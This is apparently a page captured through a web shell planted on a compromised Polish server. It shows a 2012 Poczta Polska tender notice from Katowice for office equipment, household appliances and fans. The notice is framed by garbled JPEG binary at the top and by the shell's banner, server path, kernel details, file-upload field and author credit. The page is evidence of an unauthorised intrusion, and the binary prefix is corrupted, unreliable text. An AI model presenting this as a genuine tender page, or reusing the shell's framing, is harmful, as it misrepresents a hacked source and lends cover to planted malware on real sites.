JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/349218-N-2012.html

<p class="kh_header"><b>Katowice: Dostawa sprzętu gospodarstwa domowego, sprzętu biurowego oraz wentylatorów</b><br>
<b>Numer ogłoszenia: 349218 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna" ul.Rakowiecka 26, 00-940 W-wa, KRS: 0000334972 Sąd Rej. dla m.st. W-wy, kapitał zakł.774 140 000 zł w całości wpłacony.Jednostka prowadząca post. w im. "Poczty Polskiej S.A." Centrum Infrastruktury Oddz. Regionalny , pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, woj. śląskie, tel. (32) 2538862, faks (32) 2513346.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu gospodarstwa domowego, sprzętu biurowego oraz wentylatorów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia - dostawa sprzętu gospodarstwa domowego, sprzętu biurowego oraz wentylatorów, w podziale na trzy części:
1)	część I zamówienia - dostawa sprzętu biurowego, 
2)	część II zamówienia - dostawa sprzętu gospodarstwa domowego,
3)	część III zamówienia - dostawa wentylatorów,
2.	Kod CPV określający przedmiot zamówienia: 31521100-5 Lampy na biurko, 39700000-9 Sprzęt gospodarstwa domowego, 39710000-2 Elektryczny sprzęt gospodarstwa domowego, 30141100-0 Kalkulatory kieszonkowe, 30141200-1 Kalkulatory biurkowe, 30141300-2 Kalkulatory drukujące, 42994230-1 Laminatory, 39254120-4 Zegary ścienne, 31224810-3 Przedłużacze, 39717100-2 Wentylatory. 
3.	Termin realizacji zamówienia (obowiązywania umowy): 4 tygodnie od daty podpisania umowy.
4.	Specyfikacja rodzajowo-ilościowa sprzętu, objętych przedmiotem zamówienia, zawarta jest w załączniku nr 1 do SIWZ.
5.	Wykonawca winien udzielić minimum 12 miesięcznej gwarancji (dla sprzętu z pozycji 4,5 i 8 w części I zamówienia 24 miesięcznej gwarancji) na dostarczony sprzęt licząc od daty jego dostawy.
6.	Realizacja dostawy odbędzie się jednorazowo w terminie wskazanym przez zamawiającego w ust. 3, po wcześniejszym uzgodnieniu z pracownikami wskazanymi w załączniku nr 7 do SIWZ, do następujących miejsc:
1)	Działem Zaopatrzenia i Administracji (ZORA) w  Katowicach Pl. Oddziałów Młodzieży Powstańczej 7,
2)	Wydziałem Operacyjnym Infrastruktury (WOI) w  Bielsku - Białej ul. 1 Maja 2,
3)	Wydziałem Operacyjnym Infrastruktury (WOI) w Rybniku ul. Pocztowa 2,
4)	Wydziałem Operacyjnym Infrastruktury (WOI) w Katowicach ul. Pocztowa 9,
5)	Wydziałem Operacyjnym Infrastruktury (WOI) w Zabrzu ul. Mielżyńskiego 5,
6)	Wydziałem Operacyjnym Infrastruktury (WOI) w Chorzowie z siedzibą w Katowicach pl. Oddz. Młodzieży Powstańczej 7,
7)	Wydziałem Operacyjnym Infrastruktury (WOI) w Częstochowie ul. Orzechowskiego 7,
8)	Wydziałem Operacyjnym Infrastruktury (WOI) w Będzinie ul. Krasickiego 1,
9)	Wydziałem Operacyjnym Infrastruktury (WOI) w Opolu ul. Krakowska 46,
10)	Centrum Logistyki OR w Katowicach ul. Rolna 7.
7.	Zamawiający nie jest zobowiązany do zamówienia sprzętu w pełnej ilości, określonej w załączniku nr 1. Zmniejszenie ilości zamawianego sprzętu nie może przekroczyć 20 % całości zamówienia. Z tego tytułu wykonawca nie będzie mógł wnosić jakichkolwiek roszczeń względem zamawiającego.
9.	Dostawa i wyładunek sprzętu odbywać się będą wyłącznie na koszt i ryzyko wykonawcy.
10.	Wykonawca w cenie oferty winien uwzględnić koszty transportu i rozładunku sprzętu do wskazanych miejsc dostaw.
11.	Zamawiający nie dopuszcza możliwości zmiany cen jednostkowych sprzętu w trakcie realizacji przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.52.11.00-5, 39.70.00.00-9, 39.71.00.00-2, 30.14.11.00-0, 30.14.12.00-1, 30.14.13.00-2, 42.99.42.30-1, 39.25.41.20-4, 31.22.48.10-3, 39.71.71.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Złożona oferta winna być zabezpieczona wadium w wysokości: część I zamówienia - 250,00 zł (słownie: dwieście pięćdziesiąt złotych 00/100), część II zamówienia - 600,00 zł (słownie: sześćset złotych 00/100), część III zamówienia - 500,00 zł (słownie: pięćset złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oryginał pełnomocnictwa osób podpisujących ofertę, o ile nie wynika to z innych dokumentów załączonych przez wykonawcę do oferty, a w przypadku dołączenia kserokopii pełnomocnictwa musi być ono poświadczone notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Katowicach, pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 10:00, miejsce: Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Katowicach, pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, pokój 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu biurowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Lampka na biurko	żarówki halogenowe o mocy 35-50W,   oprawa główna osadzona na elastycznym przegubie umożliwiającym regulację źródła światła, przełącznik dwupozycyjny, stabilna podstawa	szt.	46
2.	Lampka  z imadełkiem do zamontowania na sortownicach	Lampa wysięgnikowa  o minimalnym wysięgu 0,6 m (od osi obrotu wysięgnika do źródła światła) z możliwością regulowania położenia żródła światła i  z regulacją źródła światła we wszystkich pozycjach. Kabel zailający lampę minimum 1,75 m a wyłącznik lampy na źródle światła. Źródło światła świetlówka dwupinowa G23  o mocy minimum 11W.	szt.	36
3.	Kalkulator biurowy	12 pozycyjny duży wyświetlacz, pamięć , zaokrąglanie wyników, obliczanie marży,obliczenia podatkowe, funkcja sprawdzania i poprawiania obliczeń ( do 100 kroków) cofanie ostatnio wprowadzonej pozycji, klawisz podwójnego zera,  klawisz sumy całkowitej, podwójne zasilanie (słoneczne, bateryjne),  wymiary:   nie mniejsze niż 14 x 15,5 cm	szt.	74
4.	Kalkulator z drukarką 	12 pozycyjny wyświetlacz LCD, zasilanie sieciowe, obliczenia podatkowe, obliczanie marży, pamięć , zaokrąglanie wyników, tabulacja, cofanie ostatnio wprowadzonej pozycji, klawisz sumy całkowitej, klawisz podwójnego zera, 2 kolorowa drukarka, papier 58 mm, prędkość druku: nie mniej niż 2,7 linii/sek, gwarancja 2 lata	szt.	9
5.	Kalkulator z drukarką HEAVY DUTY (do intensywnej pracy)	duży 12 pozycyjny wyświetlacz, zaokrąglanie wyników, funkcja czterech miejsc po przecinku z możliwością ustawiania, obliczanie marży, funkcja obliczeń podatkowych (TAX), obiczenia sumy końcowej (GT), funkcja sprawdzania i poprawiania obliczeń do 100 kroków, funkcja przeliczania walut, klawisz cofania, klawisz zmiany znaku +/-, klawisz podwójnego zera, pamięć niezależna, plastikowe klawisze, papier 58 mm, pędkość druku: nie mniej niż 3,5 linii/sek, gwarancja 2 lata	szt.	5
6.	Laminator	Laminowanie na gorąco z wykorzystaniem dwóch wałków grzewczych, regulacja temperatury w zależności od grubości folii, funkcja rewers, wyposażony w tacę wspierającą utrzymującą folię, prędkość laminowania 300 mm/min, możliwośc laminowania folii o grubości do 2x125(250 mic), czas nagrzewania ok. 4 min . Maksymalna szerokość laminowanego dokumentu : 330 mm ( format A 3)	szt.	9
7.	Bindownica grzebieniowa	do grzbietów plastikowych, dziurkuje jednocześnie do 26 kartek papieru, oprawia do 510 kartek A4, wyposazona w dźwignię do dziurkowania, osobną dźwignię do otwierania grzbietów umożliwiającą jednoczesne dziurkowanie i zakładanie na grzbiet już przedziurkowanych kartek oraz regulator szerokości marginesu dziurkowania (3-6 mm) wraz z  czytelnym wskaźnikiem doboru grzbietu do ilości dziurkowanych kartek, system wyłączania noży dziurkujących pozwalajacy na dopasowanie ilości dziurek do rozmiaru dokumentu oraz funkcjonalny pojemnik na ścinki.	szt.	5
8.	Gilotyna do papieru	tnie jednorazowo do 15 - 20  kartek , długość cięcia min.: 310 mm (format A4), blat wykonany z MDF lub metalu, przesuwana listwa dociskowa blokująca przesuwanie się kartek, osłona noża, samoostrzące ostrze dające się zablokować podczas przenoszenia, 2 lata gwarancji	szt.	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.14.11.00-0, 30.14.12.00-1, 30.14.13.00-2, 42.99.42.30-1, 39.25.41.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu gospodarstwa domowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czajnik elektryczny bezprzewodowy	pojemność min. 1,5l max. 1,7 litra, moc 2000 - 2400 W, obudowa ze stali nierdzewnej połączona z tworzywem odpornym na przegrzanie, ergonomiczny uchwyt, automatyczne otwieranie pokrywy za pomocą przycisku zintegrowanego w uchwycie, płyta grzejna ze stali szlachetnej wbudowana w dno czajnika, automatyczne wyłączenie po zagotowaniu, automatyczne wyłączenie czajnika przy zdejmowaniu z podstawy, zabezpieczenie przed włączeniem pustego czajnika, wskażnik poziomu wody, ochrona przed przegrzaniem, wyjmowany i łatwy w czyszczeniu filtr zatrzymujący osady, podstawa obrotowa 360o, lampka kontrolna, praktyczne zwijanie kabla.	szt.	298
2.	Termos-dzbanek konferencyjny	dzbanek - wewnętrzne i zewnętrzne ścianki ze stali nierdzewnej, termiczne zabezpieczenie zamknięcia, możliwość wylewania płynów bez zdejmowania korka, izolacja próżniowa, pojemność 1,5 litra .	szt.	11
3.	Zegar ścienny	wewnętrzny, kwarcowy, zasilany bateryjnie (ogniwo 1,5 V), duże cyfry arabskie, średnica 30 - 40 cm, tarcza biała, wskazówki czarne, obudowa z tworzywa sztucznego w kolorze do wyboru: biały, czarny, srebrny	szt.	34
4.	Przedłużacz 	przedłużacz przenośny z  5 gniazdami z uziemieniem i wyłącznikiem o prostopadłościennym izolacyjnym korpusie wykonanym z tworzywa sztucznego, posiadający przewód o długości  min. 5 m z zaprasowaną wtyczką. 	szt.	238
5.	Żelazko	żelazko parowe ( moc - 2400 w.) ze stopą SteamGlide z funkcami: prasowanie na sucho/mokro, podwójny aktywny system antywapienny (zintegrowany system zapobiegający osadzaniu się kamienia umożliwiający używanie zwykłej wody z kranu), wskaźnik poziomu wody, możliwość prasowania w pionie, wytwarzanie pary - ciągle z możliwością regulacji, spryskiwacz, pokrętło do regulacji temperatury, blokada kapania, możliwość użycia wody kranowej, przeźroczysty zbiornik na wodę min. 300 ml. Długość przewodu min. 2, 8 m	szt.	5
6.	Lodówka	Wymiary (wys. x szer. x gł.) 120 -149 x 49 - 55 x 58 - 61 cm , kolor biały,  położenie zamrażarki na górze, agregat  - 1,  termostat - 1,  automatyczny sposób odszraniania (rozmrażania) chłodziarki, ręczny  sposób odszraniania (rozmrażania) zamrażalnik, sterowanie mechaniczne,  klasa energetyczna A+ , Pojemność użytkowa chłodziarki 138 - 185 litrów,  pojemność użytkowa zamrażarki 39 - 45 litrów,  powłoka antybakteryjna, półki wykonane ze szkła bezpiecznego . Wyposażenie 3 - 4 półki szklane w chłodziarce,  szuflada na warzywa i owoce, 3 - 4 półki w drzwiach,  półka w zamrażarce 	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.11.00-5, 39.70.00.00-9, 39.71.00.00-2, 31.22.48.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa wentylatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wentylator (duży - stojący) 	moc 55 W, średnica 40 - 50 cm, maksymalna wysokość 135 cm, minimalna wysokość 100 cm, regulacja nachylenia w pionie, możliwość oscylacji w poziomie, trzy stopniowa regulacja nawiewu, obudowa wykonana z wysokiej jakości tworzyw sztucznych, wirnik zabezpieczony siatką ochronną	szt.	219
2.	Wentylator biurowy	moc 40 W, średnica 30 - 35 cm, regulacja nachylenia w pionie, możliwość oscylacji w poziomie, trzy stopniowa regulacja nawiewu, obudowa wykonana z wysokiej jakości tworzyw sztucznych, wirnik zabezpieczony siatką ochronną	szt.	130
3.	Termowentylator	stopniowa regulacja termostatu, 2 stopnie ogrzewania (1000W / 2000 W), funkcja nawiewu zimnego powietrza (wentylator), lampka kontrolna, funkcja - zabezpieczenie przed przegrzaniem, kabel zasilający min. 1,5 m, pobór mocy: 2000 W.	szt.	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.71.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com